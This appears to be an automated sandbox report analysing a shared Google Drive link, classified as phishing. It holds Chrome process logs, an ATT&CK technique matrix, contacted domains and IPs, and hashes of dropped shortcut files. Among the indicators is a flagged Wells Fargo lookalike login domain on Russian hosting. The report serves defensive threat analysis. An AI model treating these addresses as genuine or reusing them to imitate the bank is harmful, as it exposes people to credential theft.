Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4288 --field-trial-handle=1836,i,8353354067160105745,7786177507070036882,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5360 --field-trial-handle=1836,i,8353354067160105745,7786177507070036882,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4288 --field-trial-handle=1836,i,8353354067160105745,7786177507070036882,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5360 --field-trial-handle=1836,i,8353354067160105745,7786177507070036882,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Drive-by Compromise
Windows Management Instrumentation2
Browser Extensions
1
Process Injection
3
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://drive.google.com/file/d/1dNrtjTqb59ZQTE3gUuVhSjEbFXuJRXW7/view?usp=sharing&ts=6786e61f0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
blobcomments-pa.clients6.google.com
142.250.186.138
truefalse
    high
    plus.l.google.com
    142.250.185.142
    truefalse
      high
      dt7pihtwl17pl.cloudfront.net
      3.167.227.114
      truefalse
        unknown
        col.eum-appdynamics.com
        44.236.9.190
        truefalse
          high
          peoplestackwebexperiments-pa.clients6.google.com
          216.58.206.74
          truefalse
            high
            bg.microsoft.map.fastly.net
            199.232.214.172
            truefalse
              high
              connect.secure.access.weilsfargoadvisors.com
              92.255.57.144
              truetrue
                unknown
                play.google.com
                142.250.186.46
                truefalse
                  high
                  ipinfo.io
                  34.117.59.81
                  truefalse
                    high
                    guard.verification.onlineconnectionstatus.my
                    188.119.66.154
                    truefalse
                      high
                      drive.google.com
                      172.217.18.14
                      truefalse
                        high
                        www.google.com
                        142.250.181.228
                        truefalse
                          high
                          static.secure.access.weilsfargoadvisors.com
                          92.255.57.144
                          truefalse
                            unknown
                            www17.wellsfargomedia.com
                            unknown
                            unknowntrue
                              unknown
                              connect.secure.wf.com
                              unknown
                              unknowntrue
                                unknown
                                pdx-col.eum-appdynamics.com
                                unknown
                                unknownfalse
                                  high
                                  connect.secure.wellsfargo.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    okra.wf.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      apis.google.com
                                      unknown
                                      unknownfalse
                                        high
                                        www15.wellsfargomedia.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www10.wellsfargomedia.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            NameMaliciousAntivirus DetectionReputation
                                            https://guard.verification.onlineconnectionstatus.my/secure/false
                                              unknown
                                              https://connect.secure.access.weilsfargoadvisors.com/auth/login/presenttrue
                                                unknown
                                                https://drive.google.com/file/d/1dNrtjTqb59ZQTE3gUuVhSjEbFXuJRXW7/view?ts=6786e61ffalse
                                                  unknown
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  23.215.22.146
                                                  unknownUnited States
                                                  20940AKAMAI-ASN1EUfalse
                                                  142.250.186.46
                                                  play.google.comUnited States
                                                  15169GOOGLEUSfalse
                                                  142.250.185.78
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  2.21.65.149
                                                  unknownEuropean Union
                                                  20940AKAMAI-ASN1EUfalse
                                                  216.58.206.74
                                                  peoplestackwebexperiments-pa.clients6.google.comUnited States
                                                  15169GOOGLEUSfalse
                                                  172.217.18.14
                                                  drive.google.comUnited States
                                                  15169GOOGLEUSfalse
                                                  216.58.206.78
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  3.167.227.88
                                                  unknownUnited States
                                                  16509AMAZON-02USfalse
                                                  2.21.65.141
                                                  unknownEuropean Union
                                                  20940AKAMAI-ASN1EUfalse
                                                  34.208.75.67
                                                  unknownUnited States
                                                  16509AMAZON-02USfalse
                                                  142.250.181.234
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  142.250.185.106
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  216.58.206.36
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  142.250.185.202
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  142.250.81.238
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  74.125.206.84
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  57.150.27.161
                                                  unknownBelgium
                                                  2686ATGS-MMD-ASUSfalse
                                                  142.250.185.163
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  142.250.185.142
                                                  plus.l.google.comUnited States
                                                  15169GOOGLEUSfalse
                                                  142.250.186.131
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  188.119.66.154
                                                  guard.verification.onlineconnectionstatus.myRussian Federation
                                                  209499FLYNETRUfalse
                                                  142.250.184.206
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  142.250.186.99
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  142.250.186.138
                                                  blobcomments-pa.clients6.google.comUnited States
                                                  15169GOOGLEUSfalse
                                                  142.250.184.202
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  142.250.184.195
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  172.217.16.202
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  1.1.1.1
                                                  unknownAustralia
                                                  13335CLOUDFLARENETUSfalse
                                                  104.102.62.193
                                                  unknownUnited States
                                                  16625AKAMAI-ASUSfalse
                                                  2.20.245.226
                                                  unknownEuropean Union
                                                  20940AKAMAI-ASN1EUfalse
                                                  34.117.59.81
                                                  ipinfo.ioUnited States
                                                  139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                  216.58.206.67
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  142.250.185.234
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  142.250.185.110
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  216.58.206.42
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  23.201.255.95
                                                  unknownUnited States
                                                  16625AKAMAI-ASUSfalse
                                                  92.255.57.144
                                                  connect.secure.access.weilsfargoadvisors.comRussian Federation
                                                  42253TELSPRUtrue
                                                  44.236.9.190
                                                  col.eum-appdynamics.comUnited States
                                                  16509AMAZON-02USfalse
                                                  239.255.255.250
                                                  unknownReserved
                                                  unknownunknownfalse
                                                  142.250.185.131
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  142.250.181.228
                                                  www.google.comUnited States
                                                  15169GOOGLEUSfalse
                                                  3.167.227.114
                                                  dt7pihtwl17pl.cloudfront.netUnited States
                                                  16509AMAZON-02USfalse
                                                  IP
                                                  192.168.2.18
                                                  192.168.2.4
                                                  Joe Sandbox version:42.0.0 Malachite
                                                  Analysis ID:1591890
                                                  Start date and time:2025-01-15 15:24:20 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                  Sample URL:https://drive.google.com/file/d/1dNrtjTqb59ZQTE3gUuVhSjEbFXuJRXW7/view?usp=sharing&ts=6786e61f
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:14
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • EGA enabled
                                                  Analysis Mode:stream
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal56.phis.win@31/6@64/338
                                                  • Exclude process from analysis (whitelisted): SgrmBroker.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 142.250.185.163, 142.250.184.206, 74.125.206.84, 172.217.18.14, 142.250.186.46, 142.250.186.138, 142.250.184.195, 142.250.186.99, 142.250.185.206, 142.250.186.131, 142.250.184.202, 172.217.18.106, 142.250.186.74, 172.217.23.106, 142.250.185.170, 142.250.185.202, 142.250.186.106, 142.250.186.170, 216.58.206.42, 142.250.181.234, 172.217.16.138, 142.250.185.234, 216.58.212.170, 142.250.186.42, 216.58.212.138, 216.58.206.67, 216.58.206.74, 142.250.185.138, 142.250.74.202, 142.250.185.74, 172.217.16.202, 172.217.18.10, 142.250.184.234, 142.250.185.106
                                                  • Excluded domains from analysis (whitelisted): fonts.googleapis.com, ssl.gstatic.com, accounts.google.com, content-autofill.googleapis.com, fonts.gstatic.com, youtube.googleapis.com, clientservices.googleapis.com, ogads-pa.googleapis.com, clients2.google.com, redirector.gvt1.com, content.googleapis.com, clients.l.google.com, www.gstatic.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                  • VT rate limit hit for: https://drive.google.com/file/d/1dNrtjTqb59ZQTE3gUuVhSjEbFXuJRXW7/view?usp=sharing&ts=6786e61f
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 13:24:50 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                  Category:dropped
                                                  Size (bytes):2675
                                                  Entropy (8bit):3.9703858639280307
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:875482ED50298BC8B8F73F05778D7E7B
                                                  SHA1:7E7FEFE2886AC1E4417B68D1950F5DDA5D6E4112
                                                  SHA-256:1519FCA479250798F422E357FCB07A181C9EF184F1281196C84A05DC7FA719BD
                                                  SHA-512:2FFE7E173B55F893E9619F3BF2F9D8F5A0C1E5E40F312D5DA3F5AB26D000DB7F2F0F5C2A1F403289B71A87D2A4837440A7FCC522D2ACE1A7BD0EC66088D91B9E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:L..................F.@.. ...$+.,.....u.<Yg......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I/Z.s....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.s....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V/Z.s....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V/Z.s...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V/Z.s.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............_......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 13:24:50 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                  Category:dropped
                                                  Size (bytes):2677
                                                  Entropy (8bit):3.9889762509371898
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:78A1F805139ED3D1368004B419587239
                                                  SHA1:AF16574348FF7B25E0197212EBB1ACBE9D0B9552
                                                  SHA-256:A3D9F93D1E5AC6C0817834AC3A6A945D29C579DD1C8BD5EB03DD35155DB3863C
                                                  SHA-512:36FD318D4DF08136E3475D9621249716AEE5E49A2D71376BB861C2DE4330DB37D2C39E815ABB10A1955F462590ECBB72742CA69AB27C68BD660B47170E32D796
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:L..................F.@.. ...$+.,.....U.<Yg......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I/Z.s....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.s....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V/Z.s....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V/Z.s...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V/Z.s.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............_......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 09:23:19 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                  Category:dropped
                                                  Size (bytes):2691
                                                  Entropy (8bit):3.9980455418835033
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:EB7D1C06187A9F7839E8D6F9CD2A143F
                                                  SHA1:69F731E2DFA6171CF69ABDE208E3F4F83EE10507
                                                  SHA-256:8538DC6C462DD421156A1DF11A0B9D06589E455E0B2D0190EEF9A2F03F94A731
                                                  SHA-512:573E8FFF18D801C6DED2AC715692B8FA8F759A1A16850E3F002B5435C221CCBA86FA85A6DE8DF025A18411378FD434CB18389AA7609BDDA85A6F8B35BC0823D3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:L..................F.@.. ...$+.,....?.4 ?.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I/Z.s....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.s....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V/Z.s....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V/Z.s...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.R.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............_......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 13:24:50 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                  Category:dropped
                                                  Size (bytes):2679
                                                  Entropy (8bit):3.9881724934210863
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:BE2431A95AE1A47C28431F37AE5FA85F
                                                  SHA1:2AFF926396E72197E532743C78B0EF098C613414
                                                  SHA-256:E330724C42E16563B54C93DE8A8B094F9D733111D35A9378C62C18DDBCE22DF0
                                                  SHA-512:1B0F65D78DF020393106A39B755D5020F03A94EBB766C4DAC9A5BE023AEA94B8B0D07F475088F57DEDF9994AD656A6D2BBC98EF46AACA67E0A53B1CFD314D566
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:L..................F.@.. ...$+.,.......<Yg......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I/Z.s....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.s....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V/Z.s....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V/Z.s...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V/Z.s.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............_......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 13:24:50 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                  Category:dropped
                                                  Size (bytes):2679
                                                  Entropy (8bit):3.975785563648458
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:13056DEFB93DFDC18F67FBB6AEBD4876
                                                  SHA1:FA24323531BED2746554BE27DE30199A27B8C5C1
                                                  SHA-256:D70DF17E8A25244030F8A16CA3FA2D8EC83ED0436EDC0C8FCB06CE9CF9B98EDE
                                                  SHA-512:59DD88008495D33AB9953B1D9F5943DA63DDDD7DA4E75EFE97852496A226A07687ED0989C8E9EAF229641F13F401AC6C9C017D2A05DEE0AF06439AE5A31FE399
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:L..................F.@.. ...$+.,....]..<Yg......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I/Z.s....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.s....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V/Z.s....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V/Z.s...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V/Z.s.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............_......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 13:24:50 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                  Category:dropped
                                                  Size (bytes):2681
                                                  Entropy (8bit):3.987244739459746
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4523C4A17888EB82E9416FB8173584DB
                                                  SHA1:59433F87185D90B1C9B62B2E0D1EE742A489281D
                                                  SHA-256:B4A4EBF0E5F3DD2E55272E05570B1223CEFEE0F4BB538779D548E028432789FE
                                                  SHA-512:8B0C895010A9AFD5613643776D3F98743C81FEC29CB7FCB670CDAF304C735FA35F4A260FA6D9EA4BFB560D2D12335263CC16EBF9F02477B64ACE94E8DAE8CD1A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:L..................F.@.. ...$+.,.....).<Yg......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I/Z.s....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.s....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V/Z.s....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V/Z.s...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V/Z.s.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............_......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                  No static file info